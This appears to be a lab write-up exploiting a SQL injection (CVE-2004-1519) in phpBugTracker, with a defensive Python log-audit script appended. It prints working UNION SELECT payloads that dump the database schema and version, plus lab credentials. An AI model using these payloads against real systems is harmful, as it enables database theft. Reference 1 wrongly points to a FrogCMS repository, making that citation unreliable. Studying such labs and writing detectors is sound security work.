phpBugTracker SQL injection CVE-2004-1519
URL: https://www.attackdefense.com/challengedetails?cid=376
Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.
Solution:
The Exploit-DB entry listed in the references contains the steps to follow to exploit the vulnerability.
Credentials:
● Email: [email protected]
● Password: password
URL: http://lu2gr8pn6c5t60xp9pr2125n9.mumbaix.attackdefenselabs.com/index.php
Admin Dashboard:
URL: http://lu2gr8pn6c5t60xp9pr2125n9.mumbaix.attackdefenselabs.com/bug.php?op=add&project=1
Step 5: Inject the payload to dump the database.
Payload: 1' union+select+(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)+--+
URL: http://lu2gr8pn6c5t60xp9pr2125n9.mumbaix.attackdefenselabs.com/bug.php?op=add&project=1%27%20union+select+(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)+--+
Payload: 1%27%20union+select+version()+--+
URL: http://lu2gr8pn6c5t60xp9pr2125n9.mumbaix.attackdefenselabs.com/bug.php?op=add&project=1%27%20union+select+version()+--+
The SQL injection attack was successful and as a result, the MySQL version information was
dumped on the webpage.
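For the defensive side, the requests above can be found in web server logs by checking that the project parameter of bug.php is a plain numeric ID. The following is an added example, not part of the original lab or of phpBugTracker; it assumes combined-format access logs and that project is always numeric (as in project=1), and the log lines, client IPs and the audit() helper are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines; client IPs, timestamps and sizes are sample values.
# The two injected requests reuse the query strings shown in this write-up.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /bug.php?op=add&project=1 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /bug.php?op=add&project='
    '1%27%20union+select+version()+--+ HTTP/1.1" 200 5188',
    '10.0.0.9 - - [01/Jan/2024:10:00:19 +0000] "GET /bug.php?op=add&project='
    '1%27%20union+select+(select(@)from(select(@:=0x00),(select(@)from('
    'information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,'
    '0x3a,column_name))))a)+--+ HTTP/1.1" 200 48213',
    '10.0.0.6 - - [01/Jan/2024:10:00:30 +0000] "GET /bug.php?op=add&project=abc HTTP/1.1" 200 900',
    '10.0.0.5 - - [01/Jan/2024:10:00:41 +0000] "GET /index.php HTTP/1.1" 200 2048',
]

# Client address and request target from a combined-format log line.
REQ = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Markers used only to label a finding; the allow-list check below decides.
MARKERS = {
    "quote": re.compile(r"['\"]"),
    "union-select": re.compile(r"\bunion\b.*\bselect\b", re.I | re.S),
    "schema-enum": re.compile(r"information_schema", re.I),
    "sql-comment": re.compile(r"--\s|#|/\*"),
}

def audit(lines, script="/bug.php", param="project"):
    """Return (client, decoded_value, tags) for every non-numeric `param` value."""
    findings = []
    for line in lines:
        m = REQ.match(line)
        if not m:
            continue  # not a request line we can parse
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith(script):
            continue
        # parse_qs URL-decodes %27, %20 and '+' before the value is inspected.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if re.fullmatch(r"[0-9]+", value):
                continue  # expected shape: a numeric project ID
            tags = [name for name, rx in MARKERS.items() if rx.search(value)]
            findings.append((client, value, tags or ["non-numeric"]))
    return findings

if __name__ == "__main__":
    for client, value, tags in audit(SAMPLE_LOG):
        print(client, tags, value[:60])
```

The same numeric allow-list, enforced in the application before the value reaches the query, is the corresponding input-validation control.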
References:
1. phpBugTracker (https://github.com/philippe/FrogCMS)
2. CVE-2004-1519 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1519)
3. phpBugTracker 1.6.0 - Multiple Vulnerabilities (https://www.exploit-db.com/exploits/36160)